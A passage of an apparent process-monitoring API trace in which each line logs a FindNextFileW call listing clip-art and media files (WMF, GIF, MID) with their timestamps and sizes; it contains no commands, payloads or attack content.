ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bc0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00218_.WMF", cAlternateFileName="")) returned 1 [0175.199] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x738, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00231_.WMF", cAlternateFileName="")) returned 1 [0175.199] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc68, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00234_.WMF", cAlternateFileName="")) returned 1 [0175.199] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf8c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00241_.WMF", cAlternateFileName="")) returned 1 [0175.199] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00246_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x15bc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00253_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1da8, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00255_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7dc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00330_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf72, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00411_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10444f68, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9d2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN00687_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN01164_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN01165_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4e02, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TN01308_.WMF", cAlternateFileName="")) returned 1 [0175.200] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00006_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x228c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00095_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00097_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x25bc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00116_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1234, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00126_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x235c, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00172_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10444f68, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10444f68, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2142, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00178_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6cc0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00232_.WMF", cAlternateFileName="")) returned 1 [0175.201] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7c4a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00233_.WMF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00402_.WMF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2054, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00482_.WMF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="TR00494_.WMF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x342e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="URBAN_01.MID", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1361, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="VCTRN_01.MID", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01219_.GIF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01237_.GIF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x167, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01238_.GIF", cAlternateFileName="")) returned 1 [0175.202] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01239_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x104b75c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x104b75c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10c77030, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01240_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01241_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01242_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1af, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01243_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01244_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x155, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01245_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ce, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01246_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xff7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01253_.GIF", cAlternateFileName="")) returned 1 [0175.203] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ab, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01268_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x255, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01292_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01293_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ad, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01294_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x161, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01295_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ef, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01296_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01297_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01298_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e, 